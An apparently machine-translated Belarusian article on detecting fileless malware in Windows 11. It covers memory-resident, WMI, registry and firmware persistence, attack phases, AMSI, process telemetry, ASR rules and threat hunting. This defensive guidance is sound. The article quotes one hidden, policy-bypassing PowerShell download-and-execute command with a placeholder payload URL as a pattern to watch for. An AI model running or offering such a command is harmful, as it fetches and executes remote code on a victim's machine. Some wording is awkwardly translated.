Як выявіць небяспечнае бязфайлавае шкоднаснае праграмнае забеспячэнне ў Windows 11

Апошняе абнаўленне: 23/11/2025

  • Бесфайлавае шкоднаснае праграмнае забеспячэнне працуе ў памяці і злоўжывае легітымнымі працэсамі, такімі як PowerShell і WMI.
  • Эфектыўнае выяўленне патрабуе маніторынгу паводзін і аналізу памяці, а не толькі файлаў.
  • AMSI, тэлеметрыя працэсаў, правілы памяншэння паверхні і праактыўнае паляванне — ключавыя функцыі Windows 11.
  • Захаванне WMI, рэестра і MBR, а таксама прашыўкі і USB пашырае паверхню атакі.

Як выявіць небяспечнае шкоднаснае праграмнае забеспячэнне без файлаў

¿Як выявіць небяспечнае шкоднаснае праграмнае забеспячэнне без файлаў? Актыўнасць атак без файлаў значна ўзрасла, і, што яшчэ горш, Windows 11 не мае імунітэтуГэты падыход абыходзіць дыск і абапіраецца на памяць і легітымныя сістэмныя інструменты; вось чаму антывірусныя праграмы на аснове сігнатур маюць праблемы. Калі вы шукаеце надзейны спосаб выяўлення, адказ заключаецца ў спалучэнні тэлеметрыя, аналіз паводзін і элементы кіравання Windows.

У цяперашняй экасістэме кампаніі, якія злоўжываюць PowerShell, WMI або Mshta, суіснуюць з больш складанымі метадамі, такімі як ін'екцыі памяці, захаванне "без дакранання" да дыска і нават злоўжыванні прашыўкайГалоўнае — разумець карту пагроз, фазы атакі і тое, якія сігналы яны пакідаюць, нават калі ўсё адбываецца ў аператыўнай памяці.

Што такое бесфайлавае шкоднаснае праграмнае забеспячэнне і чаму яно выклікае заклапочанасць у Windows 11?

Калі мы гаворым пра «бязфайлавыя» пагрозы, мы маем на ўвазе шкоднасны код, які Вам не трэба захоўваць новыя выканальныя файлы у файлавай сістэме для працы. Звычайна ён уводзіцца ў запушчаныя працэсы і выконваецца ў аператыўнай памяці, абапіраючыся на інтэрпрэтатары і двайковыя файлы, падпісаныя Microsoft (напрыклад, PowerShell, WMI, rundll32, mshtaГэта памяншае ваш след і дазваляе абыходзіць пошукавыя сістэмы, якія шукаюць толькі падазроныя файлы.

Нават офісныя дакументы або PDF-файлы, якія выкарыстоўваюць уразлівасці для запуску каманд, лічацца часткай гэтай з'явы, таму што актываваць выкананне ў памяці не пакідаючы карысных бінарных файлаў для аналізу. Злоўжыванне макрасы і DDE У Office, бо код выконваецца ў легітымных працэсах, такіх як WinWord.

Зламыснікі спалучаюць сацыяльную інжынерыю (фішынг, спам-спасылкі) з тэхнічнымі пасткамі: клік карыстальніка запускае ланцужок, у якім скрыпт загружае і выконвае канчатковую карысную нагрузку ў памяці, пазбягаючы пакідання слядоў на дыску. Мэты вар'іруюцца ад крадзяжу дадзеных да выканання праграм-вымагальнікаў і бясшумнага перамяшчэння.

Выяўленне шкоднасных праграм без файлаў

Тыпалогіі паводле ўплыву на сістэму: ад «чыстых» да гібрыдных

Каб пазбегнуць блытаніны ў паняццях, карысна падзяляць пагрозы па ступені іх узаемадзеяння з файлавай сістэмай. Такая класіфікацыя ўдакладняе што захоўваецца, дзе знаходзіцца код і якія сляды ён пакідае?.

Тып I: няма актыўнасці файлаў

Шкоднаснае праграмнае забеспячэнне без файлаў нічога не запісвае на дыск. Класічным прыкладам з'яўляецца выкарыстанне уразлівасць сеткі (як вектар EternalBlue у мінулыя часы) для рэалізацыі бэкдора, які знаходзіцца ў памяці ядра (выпадкі, падобныя да DoublePulsar). Тут усё адбываецца ў аператыўнай памяці, і ў файлавай сістэме няма артэфактаў.

Іншы варыянт — забрудзіць прашыўкі кампанентаў: BIOS/UEFI, сеткавых адаптараў, перыферыйных прылад USB (метады тыпу BadUSB) або нават падсістэм працэсара. Яны захоўваюцца нават пасля перазагрузкі і пераўсталёўкі, што стварае дадатковыя цяжкасці. Мала якія прадукты правяраюць прашыўкуГэта складаныя атакі, радзейшыя, але небяспечныя з-за сваёй скрытнасці і трываласці.

Тып II: Ускоснае архіваванне

Тут шкоднаснае праграмнае забеспячэнне не «пакідае» свой уласны выканальны файл, а выкарыстоўвае кантэйнеры, якія кіруюцца сістэмай і захоўваюцца ў выглядзе файлаў. Напрыклад, бэкдоры, якія ўсталёўваюць каманды powershell у рэпазітарыі WMI і запускаць яго выкананне з дапамогай фільтраў падзей. Можна ўсталяваць яго з каманднага радка без выдалення двайковых файлаў, але рэпазітар WMI знаходзіцца на дыску як легітымная база дадзеных, што ўскладняе яго ачыстку без уплыву на сістэму.

З практычнага пункту гледжання яны лічацца бязфайлавымі, таму што гэты кантэйнер (WMI, рэестр і г.д.) Гэта не класічны выяўляльны выканальны файл І яго ачыстка — справа няпростая. Вынік: незаўважная захавальнасць з мінімальнай колькасцю «традыцыйных» слядоў.

Эксклюзіўны кантэнт - націсніце тут  Як актываваць двухэтапную праверку на iPhone?

Тып III: для функцыянавання патрэбныя файлы

У некаторых выпадках захоўваецца захаванне без файлаў На лагічным узроўні ім патрэбны трыгер на аснове файла. Тыповым прыкладам з'яўляецца Kovter: ён рэгіструе каманду абалонкі для выпадковага пашырэння; пры адкрыцці файла з гэтым пашырэннем запускаецца невялікі скрыпт з выкарыстаннем mshta.exe, які аднаўляе шкоднасны радок з рэестра.

Хітрасць у тым, што гэтыя файлы-"прынады" з выпадковымі пашырэннямі не ўтрымліваюць аналізаванай карыснай нагрузкі, і асноўная частка кода знаходзіцца ў рэгістрацыя (іншы кантэйнер). Вось чаму яны класіфікуюцца як бязфайлавыя па ўздзеянні, хоць, строга кажучы, яны залежаць ад аднаго або некалькіх артэфактаў дыска ў якасці трыгера.

Пераносчыкі і «носьбіты» інфекцыі: куды яна пранікае і дзе хаваецца

Для паляпшэння выяўлення вельмі важна вызначыць кропку ўваходу і носьбіта інфекцыі. Гэта дапамагае распрацаваць канкрэтныя элементы кіравання Аддайце прыярытэт адпаведнай тэлеметрыі.

подзвігі

  • На аснове файлаў (Тып III): Дакументы, выканальныя файлы, старыя файлы Flash/Java або файлы LNK могуць выкарыстоўваць браўзер або рухавік, які іх апрацоўвае, для загрузкі шэл-кода ў памяць. Першы вектар — гэта файл, але карысная нагрузка перамяшчаецца ў аператыўную памяць.
  • Сеткавыя (Тып I): Пакет, які выкарыстоўвае ўразлівасць (напрыклад, у SMB), выконваецца ў карыстальніцкім асяроддзі або ядры. WannaCry папулярызаваў гэты падыход. Прамая загрузка памяці без новага файла.

апаратныя сродкі

  • прыборы (Тып I): Прашыўку дыска або сеткавай карты можна змяніць, а таксама ўвесці код. Цяжка праверыць і захоўваецца па-за аперацыйнай сістэмай.
  • Працэсар і падсістэмы кіравання (Тып I): Такія тэхналогіі, як ME/AMT ад Intel, прадэманстравалі шляхі да Сетка і выкананне па-за аперацыйнай сістэмайЁн атакуе на вельмі нізкім узроўні, з высокім патэнцыялам скрытнасці.
  • USB (Тып I): BadUSB дазваляе перапраграмаваць USB-назапашвальнік, каб ён імітаваў клавіятуру або сеткавую карту і запускаў каманды або перанакіроўваў трафік.
  • BIOS / UEFI (Тып I): шкоднаснае перапраграмаванне прашыўкі (выпадкі, падобныя да Mebromi), якое запускаецца перад запускам Windows.
  • Гіпервізар (Тып I): Рэалізацыя міні-гіпервізара пад аперацыйнай сістэмай для маскіроўкі яго прысутнасці. Рэдка, але ўжо назіраецца ў выглядзе руткітаў гіпервізара.

Выкананне і ўвядзенне

  • На аснове файлаў (Тып III): EXE/DLL/LNK або запланаваныя задачы, якія запускаюць ін'екцыі ў легітымныя працэсы.
  • Макрас (Тып III): VBA ў Office можа дэкадаваць і выконваць карысныя нагрузкі, у тым ліку поўнае праграмнае забеспячэнне-вымагальнік, са згоды карыстальніка шляхам падману.
  • Scripts (Тып II): PowerShell, VBScript або JScript з файла, камандны радок, паслугі, рэгістрацыя або WMIЗламыснік можа ўвесці скрыпт у аддаленым сеансе, не дакранаючыся да дыска.
  • Загрузачны запіс (MBR/Boot) (Тып II): Сямействы, падобныя да Petya, перазапісваюць загрузачны сектар, каб атрымаць кантроль пры запуску сістэмы. Ён знаходзіцца па-за файлавай сістэмай, але даступны для аперацыйнай сістэмы і сучасных рашэнняў, якія могуць яго аднавіць.

Як працуюць атакі без файлаў: фазы і сігналы

Нягледзячы на ​​тое, што яны не пакідаюць выканальных файлаў, кампаніі прытрымліваюцца паэтапнай логікі. Іх разуменне дазваляе ажыццяўляць маніторынг. падзеі і сувязі паміж працэсамі якія пакідаюць след.

  • Першапачатковы доступФішынгавыя атакі з выкарыстаннем спасылак або ўкладанняў, узламаных вэб-сайтаў або выкрадзеных уліковых дадзеных. Многія ланцужкі пачынаюцца з дакумента Office, які запускае каманду PowerShell.
  • Настойлівасць: бэкдоры праз WMI (фільтры і падпіскі), Ключы выканання рэестра або запланаваныя задачы, якія перазапускаюць скрыпты без новага шкоднаснага файла.
  • ЭкфільтрацыяПасля збору інфармацыі яна адпраўляецца з сеткі з выкарыстаннем надзейных працэсаў (браўзераў, PowerShell, bitsadmin) для змешвання трафіку.

Гэтая заканамернасць асабліва падступная, таму што паказчыкі нападу Яны хаваюцца ў звычайным: аргументы каманднага радка, ланцужкі працэсаў, анамальныя выходныя злучэнні або доступ да API-інтэрфейсаў ін'екцый.

Распаўсюджаныя метады: ад памяці да запісу

Акцёры абапіраюцца на цэлы шэраг метады якія аптымізуюць схаванасць. Карысна ведаць найбольш распаўсюджаныя з іх, каб актываваць эфектыўнае выяўленне.

  • Жыхар у памяціЗагрузка карысных нагрузак у прастору даверанага працэсу, які чакае актывацыі. руткіты і перахопнікі У ядры яны павышаюць узровень схаванасці.
  • Захаванне ў рэестрыЗахоўвайце зашыфраваныя блобы ў ключах і рэгідруйце іх з легітымнай праграмы запуску (mshta, rundll32, wscript). Часовы ўсталёўшчык можа самазнішчыцца, каб мінімізаваць свой след.
  • Фішынг уліковых дадзеныхВыкарыстоўваючы скрадзеныя імёны карыстальнікаў і паролі, зламыснік выконвае выдаленыя абалонкі і ўстаноўкі. ціхі доступ у рэестры або WMI.
  • «Бефайлавае» праграмнае забеспячэнне-вымагальнікШыфраванне і сувязь C2 арганізуюцца з аператыўнай памяці, што змяншае магчымасці выяўлення, пакуль пашкоджанне не стане бачным.
  • Аперацыйныя камплектыаўтаматызаваныя ланцужкі, якія выяўляюць уразлівасці і разгортваюць карысныя нагрузкі толькі ў памяці пасля таго, як карыстальнік націсне на кнопку.
  • Дакументы з кодаммакрасы і механізмы, такія як DDE, якія запускаюць каманды без захавання выканальных файлаў на дыск.
Эксклюзіўны кантэнт - націсніце тут  Як выдаліць шкоднасныя праграмы на Android

Даследаванні галіны ўжо паказалі прыкметныя пікі: у адзін з перыядаў 2018 года павелічэнне больш чым на 90% пры атаках на аснове скрыптоў і ланцужкоў PowerShell, што сведчыць аб тым, што вектар пераважнейшы з-за сваёй эфектыўнасці.

Задача для кампаній і пастаўшчыкоў: чаму блакавання недастаткова

Было б спакусліва адключыць PowerShell або забараніць макрасы назаўжды, але Вы б парушылі аперацыюPowerShell — гэта слуп сучаснага адміністравання, а Office — неабходны ў бізнэсе; сляпая блакіроўка часта немагчымыя.

Акрамя таго, ёсць спосабы абыйсці асноўныя элементы кіравання: запуск PowerShell праз DLL і rundll32, упакоўка скрыптоў у EXE-файлы, Прынясіце сваю ўласную копію PowerShell ці нават хаваць скрыпты ў выявах і здабываць іх у памяць. Такім чынам, абарона не можа грунтавацца выключна на адмаўленні існавання інструментаў.

Яшчэ адна распаўсюджаная памылка — дэлегаванне ўсяго рашэння воблаку: калі агент павінен чакаць адказу ад сервера, Вы губляеце прафілактыку ў рэжыме рэальнага часуТэлеметрычныя дадзеныя можна загружаць для ўзбагачэння інфармацыі, але Змякчэнне павінна адбывацца ў канчатковай кропцы.

Як выявіць шкоднасныя праграмы без файлаў у Windows 11: тэлеметрыя і паводзіны

Выйгрышная стратэгія — гэта кантраляваць працэсы і памяцьНе файлы. Шкоднасныя паводзіны больш стабільныя, чым формы файлаў, што робіць іх ідэальнымі для механізмаў прафілактыкі.

  • AMSI (інтэрфейс сканавання антывірусных праграм)Ён перахоплівае скрыпты PowerShell, VBScript або JScript, нават калі яны дынамічна ствараюцца ў памяці. Выдатна падыходзіць для захопу абфускаваных радкоў перад выкананнем.
  • Маніторынг працэсаўстарт/фініш, PID, бацькі і дзеці, маршруты, камандныя радкі і хэшы, а таксама дрэвы выканання, каб зразумець усю гісторыю.
  • Аналіз памяцівыяўленне ін'екцый, адлюстраванняў або PE-нагрузак без дакранання да дыска і прагляд незвычайных выканальных абласцей.
  • Абарона стартаракантроль і аднаўленне MBR/EFI ў выпадку ўмяшання.

У экасістэме Microsoft Defender for Endpoint спалучае AMSI, маніторынг паводзінДля маштабавання выяўлення новых або заблытаных варыянтаў выкарыстоўваюцца сканаванне памяці і машыннае навучанне на аснове воблака. Іншыя пастаўшчыкі выкарыстоўваюць падобныя падыходы з рэзідэнтнымі рухавікамі ядра.

Рэалістычны прыклад карэляцыі: ад дакумента да PowerShell

Уявіце сабе ланцужок, дзе Outlook спампоўвае ўкладанне, Word адкрывае дакумент, уключаецца актыўны кантэнт, а PowerShell запускаецца з падазронымі параметрамі. Адпаведная тэлеметрыя пакажа... Камандны радок (напрыклад, абыход ExecutionPolicy, схаванае акно), падключэнне да ненадзейнага дамена і стварэнне даччынага працэсу, які ўсталёўваецца ў AppData.

Агент з лакальным кантэкстам здольны спыніцца і рухацца назад шкоднасную дзейнасць без ручнога ўмяшання, акрамя апавяшчэння SIEM або па электроннай пошце/SMS. Некаторыя прадукты дадаюць узровень атрыбуцыі першапрычыны (мадэлі тыпу StoryLine), які паказвае не на бачны працэс (Outlook/Word), а на поўная шкоднасная тэма і яго паходжанне для комплекснай ачысткі сістэмы.

Тыповы шаблон каманды, на які варта звярнуць увагу, можа выглядаць наступным чынам: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Логіка — гэта не дакладны радок, але набор сігналаўабыход палітыкі, схаванае акно, ачыстка загрузкі і выкананне ў памяці.

AMSI, канвеер і роля кожнага ўдзельніка: ад канчатковай кропкі да SOC

Акрамя захопу сцэнарыяў, надзейная архітэктура арганізуе крокі, якія спрашчаюць расследаванне і рэагаванне. Чым больш доказаў перад выкананнем нагрузкі, тым лепш., лепшае.

  • Перахоп скрыптаAMSI дастаўляе кантэнт (нават калі ён генеруецца на хаду) для статычнага і дынамічнага аналізу ў канвееры шкоднасных праграм.
  • Падзеі працэсуЗбіраюцца PID, бінарныя файлы, хэшы, маршруты і іншыя дадзеныя. аргументы, усталёўваючы дрэвы працэсаў, якія прывялі да канчатковай загрузкі.
  • Выяўленне і справаздачнасцьВыяўленні адлюстроўваюцца на кансолі прадукту і перасылаюцца на сеткавыя платформы (NDR) для візуалізацыі кампаніі.
  • Гарантыі карыстальнікаНават калі скрыпт устаўляецца ў памяць, фрэймворк AMSI перахоплівае яго у сумяшчальных версіях Windows.
  • Магчымасці адміністратара: канфігурацыя палітыкі для ўключэння праверкі скрыптоў, блакіроўка на аснове паводзін і стварэнне справаздач з кансолі.
  • Праца SOC: выманне артэфактаў (VM UUID, версія АС, тып скрыпта, працэс-ініцыятар і яго бацькоўскі працэс, хэшы і камандныя радкі) для аднаўлення гісторыі і правілы ліфтаў будучыя.
Эксклюзіўны кантэнт - націсніце тут  Як абараніць сябе ад камп'ютэрных чарвякоў

Калі платформа дазваляе экспартаваць буфер памяці У сувязі з выкананнем даследчыкі могуць генераваць новыя выяўленні і ўзбагачаць абарону ад падобных варыянтаў.

Практычныя меры ў Windows 11: прафілактыка і паляванне

Як правільна ўсталяваць Windows 11 у 2025 годзе

Акрамя EDR з праверкай памяці і AMSI, Windows 11 дазваляе закрываць прасторы для атак і паляпшаць бачнасць з дапамогай убудаваныя элементы кіравання.

  • Рэгістрацыя і абмежаванні ў PowerShellУключае рэгістрацыю блокаў скрыптоў і рэгістрацыю модуляў, ужывае абмежаваныя рэжымы, дзе гэта магчыма, і кантралюе выкарыстанне Абыход/Схаваны.
  • Правілы скарачэння паверхні атакі (ASR): блакуе запуск скрыптоў працэсамі Office і Злоўжыванне WMI/PSExec, калі не патрэбны.
  • Палітыкі макрасаў Office: па змаўчанні адключае ўнутранае падпісанне макрасаў і строгія спісы даверу; кантралюе састарэлыя патокі DDE.
  • Аўдыт WMI і рэестр: кантралюе падпіскі на падзеі і ключы аўтаматычнага выканання (Run, RunOnce, Winlogon), а таксама стварэнне задач па раскладзе.
  • Абарона ад запуску: актывуе бяспечную загрузку, правярае цэласнасць MBR/EFI і пацвярджае адсутнасць змяненняў пры запуску.
  • Латанне і ўмацаванне: закрывае ўразлівасці, якія можна выкарыстоўваць, у браўзерах, кампанентах Office і сеткавых службах.
  • Усведамленненавучае карыстальнікаў і тэхнічныя каманды фішынгу і сігналам таемныя пакаранні смерцю.

Для пошуку сканцэнтруйцеся на пытаннях аб: стварэнні працэсаў Office для PowerShell/MSHTA, аргументах з радок загрузкі/файл загрузкіСкрыпты з празрыстай абфускацыяй, рэфлексіўнымі ін'екцыямі і выходнымі сеткамі ў падазроныя дамены верхняга ўзроўню. Спасылайцеся на гэтыя сігналы з рэпутацыяй і частатой, каб паменшыць шум.

Што можа выявіць кожны рухавік сёння?

Карпаратыўныя рашэнні Microsoft спалучаюць AMSI, паводніцкую аналітыку, праверыць памяць і абарона загрузачнага сектара, а таксама воблачныя мадэлі машыннага навучання для маштабавання супраць новых пагроз. Іншыя пастаўшчыкі ўкараняюць маніторынг на ўзроўні ядра, каб адрозніваць шкоднаснае праграмнае забеспячэнне ад бяспечнага з аўтаматычным адкатам змяненняў.

Падыход, заснаваны на гісторыі пакарання смерцю Гэта дазваляе вызначыць першапрычыну (напрыклад, укладанне Outlook, якое запускае ланцужок) і паменшыць колькасць праблем ва ўсім дрэве: скрыпты, ключы, задачы і прамежкавыя двайковыя файлы, пазбягаючы засяроджвання на бачным сімптоме.

Тыповыя памылкі і як іх пазбегнуць

Як ачысціць рэестр Windows, нічога не парушаючы

Блакіроўка PowerShell без альтэрнатыўнага плана кіравання не толькі непрактычная, але і... спосабы яго ўскоснага выклікуТое ж самае тычыцца і макрасаў: альбо вы кіруеце імі з дапамогай палітык і подпісаў, альбо бізнес пацерпіць. Лепш засяродзіцца на тэлеметрыі і правілах паводзін.

Яшчэ адна распаўсюджаная памылка — меркаванне, што даданне праграм у белы спіс вырашае ўсё: тэхналогія без файлаў абапіраецца менавіта на гэта. давераныя праграмыКантроль павінен назіраць за тым, што яны робяць і як яны звязаны, а не толькі за тым, ці ім дазволена.

З улікам усяго вышэйпералічанага, безфайлавае шкоднаснае праграмнае забеспячэнне перастае быць "прывідам", калі вы адсочваеце тое, што сапраўды важна: паводзіны, памяць і паходжанне кожнага выканання. Спалучэнне AMSI, пашыранай тэлеметрыі працэсаў, убудаваных элементаў кіравання Windows 11 і ўзроўню EDR з аналізам паводзін дае вам перавагу. Дадайце да гэтага рэалістычныя палітыкі для макрасаў і PowerShell, аўдыт WMI/рэестра і паляванне, якое прыярытызуе камандныя радкі і дрэвы працэсаў, і вы атрымаеце абарону, якая разрывае гэтыя ланцужкі, перш чым яны выдадуць гук.

звязаныя артыкулы:
Кампутарныя сеткі